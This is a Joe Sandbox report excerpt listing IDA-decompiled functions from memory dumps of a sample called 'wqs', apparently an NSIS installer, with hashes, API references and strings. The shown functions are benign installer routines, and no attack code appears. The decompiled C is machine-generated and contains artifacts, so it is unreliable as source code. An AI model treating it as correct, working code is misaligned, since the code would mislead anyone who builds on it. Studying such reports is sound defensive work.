Opcode ID: 62a836cc9683e29415f96f3c9c682090c5819f904a7c368c13956997d0fabf12
Instruction ID: 92243f2016f1bf9ae9a1bd538fa1d8ac7f74e56bf11390272f1e383aa82c398a
Opcode Fuzzy Hash: 62a836cc9683e29415f96f3c9c682090c5819f904a7c368c13956997d0fabf12
Instruction Fuzzy Hash: 95F0AC722061387BDA2116A68C4CC9BBEACDF8B2F5B110665F628921A096615D01EBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405e0d
0x00405e1a
0x00405e1b
0x00405e26
0x00405e2e
0x00405e2e
0x00405e36

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD

Uniqueness

Uniqueness Score: -1.00%

Function 6C7710E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E6C7710E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x6c77506c = _a8;
				 *0x6c775070 = _a16;
				 *0x6c775074 = _a12;
				_a12( *0x6c775048, E6C771651, _t73);
				_t66 =  *0x6c77506c +  *0x6c77506c * 4 << 3;
				_t27 = E6C7712E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x6c775040;
							if( *0x6c775040 == 0) {
								goto L26;
							}
							E6C771603( *0x6c775074, _t31 + 4, _t66);
							_t34 =  *0x6c775040;
							_t86 = _t86 + 0xc;
							 *0x6c775040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E6C771312(E6C77135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E6C771381(_t80, E6C7712E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E6C771603(_t10,  *0x6c775074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x6c775040;
							 *0x6c775040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x6c775070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E6C771603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x6c77506c +  *0x6c77506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E6C771603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x6c775070);
						 *( *0x6c775070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x6c7710eb
0x6c771100
0x6c771109
0x6c77110e
0x6c771119
0x6c77111c
0x6c771125
0x6c771129
0x6c77112b
0x6c7712b0
0x6c7712ba
0x6c7712ba
0x6c771132
0x6c771132
0x6c771137
0x6c771138
0x6c77113a
0x6c77113d
0x6c771256
0x6c771259
0x6c771271
0x6c771271
0x6c771278
0x00000000
0x00000000
0x6c771285
0x6c77128a
0x6c77128f
0x6c771294
0x6c77129a
0x6c77129b
0x00000000
0x6c77129b
0x6c77125b
0x6c77125e
0x6c7711bc
0x6c7711bf
0x6c7711c2
0x6c7711cb
0x6c7711d0
0x00000000
0x6c7711d1
0x6c771264
0x6c771266
0x6c7711a2
0x6c7711a5
0x6c7711a8
0x6c7711b1
0x00000000
0x6c7711b1
0x6c771164
0x6c771165
0x6c771177
0x6c771180
0x6c771184
0x6c77118e
0x6c771191
0x6c771193
0x6c771193
0x00000000
0x6c771165
0x6c771143
0x6c771218
0x6c77121d
0x6c771221
0x6c771223
0x6c77122c
0x6c77122f
0x6c771238
0x6c77123d
0x6c77123d
0x6c771247
0x6c77124a
0x00000000
0x6c771250
0x6c771149
0x6c77114c
0x6c7711e9
0x6c7711ed
0x6c7711f7
0x6c7711fb
0x6c771205
0x6c77120a
0x6c771211
0x00000000
0x6c771211
0x6c771152
0x6c771155
0x00000000
0x00000000
0x6c77115b
0x6c77115e
0x6c7711b8
0x00000000
0x6c7711b8
0x6c771160
0x6c771162
0x6c77119e
0x00000000
0x6c77119e
0x00000000
0x6c7712a1
0x6c7712a1
0x6c7712ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6C771171
GlobalAlloc.KERNEL32(00000040,?), ref: 6C7711E3
GlobalFree.KERNEL32 ref: 6C77124A
GlobalFree.KERNEL32(?), ref: 6C77129B
GlobalFree.KERNEL32(00000000), ref: 6C7712B1

Memory Dump Source

Source File: 0000000B.00000002.1053928875.000000006C771000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C770000, based on PE: true

Associated: 0000000B.00000002.1053905102.000000006C770000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1053982527.000000006C774000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000B.00000002.1054013557.000000006C776000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6c770000_wqs.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: f092032b14d6e320881d38d12eeb56a0380dfd58af14916f7313a02e6a2a27fe
Instruction ID: a11d1958743188a5a9f2c3db5957ab54c4a9ac4efe18729927e82f2eaa959958
Opcode Fuzzy Hash: f092032b14d6e320881d38d12eeb56a0380dfd58af14916f7313a02e6a2a27fe
Instruction Fuzzy Hash: F95189B5A002199FDF618F68DA6CA6577B8FB0A318B008539E949DBA10EB30D904CB70

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nsf8786.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsf8786.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsf8786.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsf8786.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC
C:\Users\user\AppData\Local\Temp\nsf8786.tmp, xrefs: 00402683

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsf8786.tmp$C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll
API String ID: 1659193697-4241422954
Opcode ID: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
Opcode Fuzzy Hash: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x42aa20 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}

0x00403020
0x00403040
0x0040304a
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3355392842
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(00030424,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406419
0x0040641b
0x00406433
0x00406438
0x0040643d
0x0040647b
0x0040647b
0x0040643f
0x00406451
0x0040645c
0x00406462
0x0040646d
0x00000000
0x00000000
0x0040646d
0x00406481

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll), ref: 0040645C

Strings

Call, xrefs: 00406412

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
